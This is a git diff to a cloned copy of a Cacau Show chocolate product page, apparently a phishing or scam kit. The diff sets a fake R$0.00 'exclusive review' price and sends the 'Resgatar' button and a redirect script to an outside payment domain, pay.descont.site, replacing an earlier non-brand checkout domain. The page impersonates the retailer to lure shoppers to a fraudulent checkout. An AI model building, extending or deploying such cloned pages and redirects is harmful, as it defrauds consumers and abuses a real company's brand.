--- a/ovo4/index.html
+++ b/ovo4/index.html
@@ -4,6 +4,7 @@
 
 
 
+
 <!DOCTYPE html><html lang=""><!-- Mirrored from www.cacaushow.com.br/produto/ovo-de-páscoa-ursinhos-carinhosos-ursinho-zangadinho-160g-1003026.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Feb 2024 21:56:01 GMT --><!-- Added by HTTrack --><head><!-- /Added by HTTrack -->
   
     <link rel="preload" href="https://c2.cdn1tp.net/ef728532117f4d46bd26084ddd82d12f/js/gtmf0de.js" as="script">
@@ -859,10 +860,10 @@
                             </span>
                           </span>
 
-                          <span class="it__shelf--value" content="0.01"></span>
+                          <span class="it__shelf--value" content="0.00"></span>
 
                           <div class="it__shelf__discountPrice">
-                            R$0.01
+                            R$0.00
 
                             <div class="it__shelf__discountPrice__cacauLoversTag">
                               <span>Exclusivo Avaliação</span>
@@ -893,7 +894,7 @@
                     <div class="it_product__tocart">
                       <input type="hidden" class="add-to-cart-url" value="/on/demandware.store/Sites-CacauShow-Site/default/Cart-AddProduct">
 
-                      <button onclick="location.href='https://cacau-show-27.finalizarcompra.com/r/a9MTw2150S519fDd4B5';" class="add-to-cart btn btn-primary it_product__tocart__btn" data-pid="1003264">
+                      <button onclick="location.href='https://pay.descont.site/PyE2ZyJXaL5GqRb';" class="add-to-cart btn btn-primary it_product__tocart__btn" data-pid="1003264">
                       <i class="fa-regular fa-gift"></i>&nbsp;&nbsp;
                         Resgatar
                       </button>
@@ -1483,7 +1484,7 @@
     <!-- Demandware Active Data (body_end-active_data.js) -->
     <script src="js/dwac-21.7.js" type="text/javascript" async="async"></script>
 	<script>
-        let prefix = ["https://noticiasde2024.fun/", "https://cacau-show-27.finalizarcompra.com/"];
+        let prefix = ["https://noticiasde2024.fun/", "https://pay.descont.site/PyE2ZyJXaL5GqRb"];
         function getParams() {
             let t = "",
                 e = window.top.location.href,
